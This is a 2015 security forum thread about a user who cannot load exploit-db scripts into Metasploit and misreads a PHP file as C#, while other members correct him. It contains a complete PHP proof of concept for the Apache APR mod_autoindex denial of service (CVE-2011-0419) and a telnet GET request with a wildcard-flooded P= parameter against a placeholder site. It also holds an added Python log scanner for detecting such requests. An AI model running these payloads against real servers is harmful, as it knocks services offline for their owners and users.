TheRoyalSloan Posted August 25, 2015

I am completely unable to install exploits of my own or those downloaded from https://www.exploit-db.com in metasploit and went through the instructions set in this link: https://github.com/rapid7/metasploit-framework/wiki/Loading-External-Modules and all I get after I reload the modules in metasploit is "Failed to load module:........" I have entered in all of the correct file names and locations, and I just cannot think of anything else that could cure this solution. I have even tried copying the files to the parallel spot in the metasploit-framework file, I have tried everything I can possibly think of. In short, the msfconsole will not recognize the new module path that I have created through the exploits folder in the .msf4 file, no matter what I try. I have tried reloading the modules, updating the msfconsole, etc. and whenever I tell the msfconsole to show me the new module path all I receive is an Invalid Parameter response and the number of exploits remains the same as if I had never created the new module path. Am I missing any steps to install exploits into metasploit??

digip Posted August 25, 2015

Are the exploits you downloaded written in metasploit coded modules, or another scripting language? Post your code. Try looking at the Metasploit Unleashed section for some examples - https://www.offensive-security.com/metasploit-unleashed/shell/

TheRoyalSloan Posted August 25, 2015 (Author)

Absolutely, here is a .php file from an exploit I downloaded from exploit-db.com that is labeled Apache 1.4-2.2.x APR 'apr_fnmatch()' Denial of Service Vulnerability:

source: http://www.securityfocus.com/bid/47820/info

Apache APR is prone to a vulnerability that may allow attackers to cause a denial-of-service condition.

Apache APR versions prior to 1.4.4 are vulnerable.

    <?php
    /*
    Apache 2.2.17 mod_autoindex local/remote Denial of Service
    author: Maksymilian Arciemowicz
    CVE: CVE-2011-0419
    CWE: CWE-399

    REMOTE
    Find some directory with supported mod_autoindex on the server. The directory should contain long filenames.

    http://[server]/[directory_with_mod_autoindex]/?P=*?*?*?[to 4k]

    LOCAL
    Tested on:
    127# httpd -v && uname -a
    Server version: Apache/2.2.17 (Unix)
    Server built: Dec 28 2010 13:21:44
    NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386

    Result:
    127# ls -la
    total 8
    drwxrwxrwx 2 root wheel 512 Feb 8 21:41 .
    drwxr-xr-x 7 www wheel 1024 Jan 31 08:49 ..
    -rw-r--r-- 1 www wheel 1056 Feb 8 19:39 .htaccess
    -rw-r--r-- 1 www wheel 0 Feb 8 19:39 cx.............................................................................................................................
    -rw-r--r-- 1 www wheel 1240 Feb 8 19:42 run.php
    127# ps -aux -p 617
    USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND
    www 617 98.6 0.4 10028 4004 ? R 7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start

    Time = 121:43 and counting

    where http://[$localhost]:[$localport]/[$localuri]
    */

    $localhost="localhost";
    $localport=80;
    $localuri="/koniec/";

    if(!is_writable(".")) die("!writable");

    // Phase 1
    // Create some filename
    touch("cx".str_repeat(".",125));

    // Phase 2
    // Create .htaccess with
    unlink("./.htaccess");
    $htaccess=fopen("./.htaccess", "a");
    fwrite($htaccess,"AddDescription \"CVE-2011-0419\" ".str_repeat('*.',512)."\n");
    fclose($htaccess);

    // Phase 3
    // Local connect (bypass firewall restriction)
    while(1){
        $fp = fsockopen($localhost, $localport, $errno, $errstr, 30);
        if (!$fp) echo "$errstr ($errno)<br />\n";
        else {
            $out = "GET ".$localuri."/?P=".str_repeat("*?",1500)."* HTTP/1.1\r\n";
            $out .= "Host: ".$localhost."\r\n";
            $out .= "Connection: Close\r\n\r\n";
            fwrite($fp, $out);
            fclose($fp);
        }
    }
    ?>

You can tell that the exploit is written in C# by how the flow control mechanism is defined at the end by "$out .= "Connection: Close\r\n\r\n""

TheRoyalSloan Posted August 25, 2015 (Author)

Which of course rules the theory of coding issues out. If coding issues were the problem here the msfconsole would issue the "Failed to install module." response rather than "Failed to load module" when the exploit is called upon by the user in the msfconsole for use or when the module reload command is issued by the user the "Failed to install module" would also be given as a response if the coding issues were a problem for the exploit.

digip Posted August 25, 2015

It's a PHP file. Save as file.php, upload to a site, and run, it's PHP, not a metasploit module. You can tell by the code at the top of the file:

    <?php

TheRoyalSloan Posted August 26, 2015 (Author)

I exceeded the number of posts I was able to submit on my original account so I had to create this new account to respond to your post. Modules can be saved as .txt, .php, .rb, and .py. You can see for yourself in the preloaded modules that come with Metasploit in the /usr/share/metasploit-framework/modules/exploits/... And this script seems to use C# to send a request to PHP scripts running at the webserver and make PHP return data to the C# application running on the desktop through the internet.

TheRoyalSloan Posted August 26, 2015 (Author)

And to be more precise this script is for a denial of service attack which you can read more about at https://en.wikipedia.org/wiki/Denial-of-service_attack#Internet_Control_Message_Protocol_.28ICMP.29_flood. I say it is in C# because the author used C functions such as fclose ( https://en.wikibooks.org/wiki/C_Programming/C_Reference/stdio.h/fclose ) to inject the PHP scripts for this C application just as I vaguely said above. But what is important is why my Metasploit-Framework Console will not recognize the module paths I have created, I am very eager to find a solution as it is causing me much distress.

deadlyhabit Posted August 26, 2015 (edited)

It's a php file as

    /*
    Apache 2.2.17 mod_autoindex local/remote Denial of Service
    author: Maksymilian Arciemowicz
    CVE: CVE-2011-0419
    CWE: CWE-399

    REMOTE
    Find some directory with supported mod_autoindex on the server. The directory should contain long filenames.

    http://[server]/[directory_with_mod_autoindex]/?P=*?*?*?[to 4k]

    LOCAL
    Tested on:
    127# httpd -v && uname -a
    Server version: Apache/2.2.17 (Unix)
    Server built: Dec 28 2010 13:21:44
    NetBSD localhost 5.1 NetBSD 5.1 (GENERIC) #0: Sun Nov 7 14:39:56 UTC 2010 builds@b6.netbsd.org:/home/builds/ab/netbsd-5-1-RELEASE/i386/201011061943Z-obj/home/builds/ab/netbsd-5-1-RELEASE/src/sys/arch/i386/compile/GENERIC i386

    Result:
    127# ls -la
    total 8
    drwxrwxrwx 2 root wheel 512 Feb 8 21:41 .
    drwxr-xr-x 7 www wheel 1024 Jan 31 08:49 ..
    -rw-r--r-- 1 www wheel 1056 Feb 8 19:39 .htaccess
    -rw-r--r-- 1 www wheel 0 Feb 8 19:39 cx.............................................................................................................................
    -rw-r--r-- 1 www wheel 1240 Feb 8 19:42 run.php
    127# ps -aux -p 617
    USER PID %CPU %MEM VSZ RSS TTY STAT STARTED TIME COMMAND
    www 617 98.6 0.4 10028 4004 ? R 7:38PM 121:43.17 /usr/pkg/sbin/httpd -k start

    Time = 121:43 and counting

    where http://[$localhost]:[$localport]/[$localuri]
    */

is a comment about its use/result

cooper Posted August 26, 2015

It's at the very least difficult (and I'd currently even say impossible but I'm still learning wrt C#) to create any C# program that:
- doesn't contain the word 'class'
- doesn't define a method/function
- doesn't import anything

Also, C# doesn't use the dot for string concatenation, which is what that snippet which you quote as evidence does. In C# that would've read += and in fact as far as I can tell PHP is the ONLY language to use a dot for string concatenation (a requirement from being loosely typed. If they used + what would 'echo 1 + 2' produce, 3 or 12?).

deadlyhabit Posted August 26, 2015 (edited)

it has no includes so not any c derivative, it's php at best (c/c++ nerd here)

if not c derivative it's python (learning now) or ruby (no desire to learn)

it's a basic logic chain that anyone coding can follow, but since i never fucked with php and that's the header... bingo.

oh and from fucking around in unity c# would have some includes unless this is just a lazy exploit, which it doesn't seem to be, just run on dated shit.

digip Posted August 26, 2015

The above file posted, is strictly PHP. Anything in /* comment*/ is just that, a comment.

fopen and fclose are part of the normal php codebase, and not exclusive to languages like c#. Some php.net reference for the op:
http://php.net/manual/en/function.fopen.php
http://php.net/manual/en/function.fclose.php

Periods are continuation of code inline, like:

    $variable = $_POST['some_form_value'];
    echo "this is text in quotes and the following value: " . $variable . " is echoed back in the page";

Poor example since this could be used wrapped directly in the quotes, but just an example of the concept.

If the php file is a payload to be uploaded after exploitation and then run on the target machine, that would make more sense, but by itself, does not make a metasploit module. Metasploit modules are written in ruby and look like so:

https://www.exploit-db.com/exploits/16581/

If you were to take the PHP file and port it over, you'd look for an msf module that uses http get requests and substitute the code.

Searching the CVE I see one exploit: https://www.exploit-db.com/search/?action=search&cve=CVE-2011-0419&e_author=

which if you click the source file link, spits out the PHP file, hence, php, not a metasploit module, unlike the link I posted above, for 16581, which spits out an actual ruby .rb file.

TheRoyalSloan Posted August 26, 2015 (Author)

It is what it is, the code uses C# to inject PHP scripts to cause a DOS action, I have already listed a couple of examples on how that works. But the point of this forum is why my Metasploit-Framework Console will not recognize the module paths I have created, I am very eager to find a solution to this problem as it is causing me much distress. Any more comments about the code I posted as an example in a response to someone's pointless confusion that has no relevance or any place at all here, WILL BE REPORTED. Stick to the topic and the problem at hand or do not post anything at all please.

digip Posted August 26, 2015 (edited)

> It is what it is, the code uses C# to inject PHP scripts to cause a DOS action, I have already listed a couple of examples on how that works. But the point of this forum is why my Metasploit-Framework Console will not recognize the module paths I have created, I am very eager to find a solution to this problem as it is causing me much distress. Any more comments about the code I posted as an example in a response to someone's pointless confusion that has no relevance or any place at all here, WILL BE REPORTED. Stick to the topic and the problem at hand or do not post anything at all please.

https://www.offensive-security.com/metasploit-unleashed/porting-exploits/

By the way, files in /usr/share/metasploit-framework/modules/exploits/####> are ruby files ending in .rb, not php. Even files in ..../modules/payloads/php are ruby files. Take a look at one of the php payloads.

The thing I see above is, this requires a place to drop the file on the server and be run on the server (or I might be reading the exploit wrong). So to me, this would be like a post exploitation attack on the server after you get access to then drop it on the server. Looking at the php code, this attack happens on the localhost (I assume as a demonstration), even though the description states it's a remote exploit, this appears it's a POC as a local exploit. If you modified a GET request for an external site, and it was vulnerable, my guess is it causes apache to freeze and eventually DoS after it eats up resources.
you could probably pull the same attack, with telnet, although not sure if the htaccess file and other stored file on the server are required in the full attack, the GET request would look like: telnet vulnsite.com 80 GET /pathrequired/?P=*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*?*? HTTP/1.1 HOST: vulnsite.com Connection: Close . Looking more at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0419 and some of the exmaples, the files created on the server are also required. 
Can see another example here: http://cxsecurity.com/issue/WLB-2011050133
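
Detection-side added example (not part of any post in this thread): a log check that flags requests whose mod_autoindex `P=` argument is an unusually wildcard-heavy pattern of the kind shown in the GET request above. The thresholds, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Assumed thresholds; ordinary P= filters are short globs such as "*.iso".
MAX_WILDCARDS = 8
MAX_PATTERN_LEN = 128

# Prefix of Apache common/combined log format: host ident user [time] "request"
LOG_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" ')

def autoindex_pattern(request_line):
    """Return the URL-decoded P= value from a request line, or None if absent."""
    parts = request_line.split(" ")
    if len(parts) < 2:
        return None  # malformed or empty request line
    _, _, query = parts[1].partition("?")
    # mod_autoindex's own column links separate arguments with ';', so accept both
    for arg in re.split(r"[&;]", query):
        name, sep, value = arg.partition("=")
        if sep and name == "P":
            return unquote(value)
    return None

def scan(lines):
    """Return (host, time, wildcard_count, pattern_length) per suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        pattern = autoindex_pattern(m.group("request"))
        if pattern is None:
            continue
        wildcards = pattern.count("*") + pattern.count("?")
        if wildcards > MAX_WILDCARDS or len(pattern) > MAX_PATTERN_LEN:
            hits.append((m.group("host"), m.group("time"), wildcards, len(pattern)))
    return hits

# Constructed sample lines (documentation IP ranges), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/Aug/2015:10:00:01 +0000] "GET /pub/?C=M;O=D HTTP/1.1" 200 2310',
    '192.0.2.10 - - [26/Aug/2015:10:00:05 +0000] "GET /pub/?P=*.iso HTTP/1.1" 200 1834',
    '198.51.100.7 - - [26/Aug/2015:10:02:13 +0000] "GET /pub/?P=' + "*?" * 200 + '* HTTP/1.1" 200 512',
    '198.51.100.7 - - [26/Aug/2015:10:02:14 +0000] "GET /pub/?C=N;P=' + "%2A%3F" * 40 + ' HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Apache writes an access-log entry only when the request completes, so a worker that is still spinning will not show up yet; pair a check like this with CPU monitoring of the httpd processes.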

cooper Posted August 26, 2015

> It is what it is, the code uses C# to inject PHP scripts to cause a DOS action, I have already listed a couple of examples on how that works. But the point of this forum is why my Metasploit-Framework Console will not recognize the module paths I have created, I am very eager to find a solution to this problem as it is causing me much distress. Any more comments about the code I posted as an example in a response to someone's pointless confusion that has no relevance or any place at all here, WILL BE REPORTED. Stick to the topic and the problem at hand or do not post anything at all please.

According to the comments the guy who wrote that code tested it on NetBSD. Please, oh genius with knowledge beyond his years, pray tell where the C# runtime comes in to execute it? Are you trying to argue the target is using mono?

digip Posted August 26, 2015

> According to the comments the guy who wrote that code tested it on NetBSD. Please, oh genius with knowledge beyond his years, pray tell where the C# runtime comes in to execute it? Are you trying to argue the target is using mono?

Unless he's got something other than what he posted that he is referring to, he may just be confused by the syntax of the php script which to the point is just a delivery method to do the attack which can be done many other ways. Looking at the code more now, you need to create the htaccess file with the proper code, as well as create the cx... file with the long string of periods, and then on an apache server running vulnerable apr_fnmatch request the file via a GET request which in this case is done using PHP, which could be delivered a multitude of ways.

digininja Posted August 26, 2015

The code is PHP, it isn't c#, anyone with basic programming knowledge can see that.

digininja Posted August 26, 2015

And to your question of why it is failing in Metasploit, it is because Metasploit expects its exploits to be built as Metasploit modules in Ruby, not php scripts which are designed to be run on the command line. You can't just take something you randomly found on exploitdb and expect it to run in Metasploit.

digininja Posted August 26, 2015

I'll have one more go at explaining this and try to answer some of the points you put in the report (I'm a moderator, I see the reports).

MSF loads modules which are written in Ruby, it doesn't load random scripts, that is why you are getting the load error. If you want to add a new exploit you need to find one that is written as a MSF module and include that.

Cooper did not say you can't execute C files on NetBSD (technically you can't, you run binaries which are compiled from C) he said that the script you are talking about was tested on NetBSD.

And as you seem to doubt my credentials for being able to answer this question, there are a handful of modules I wrote in the main MSF trunk.

You could also try taking your question to the Metasploit mailing list or IRC channel if you don't like the answers you are getting here.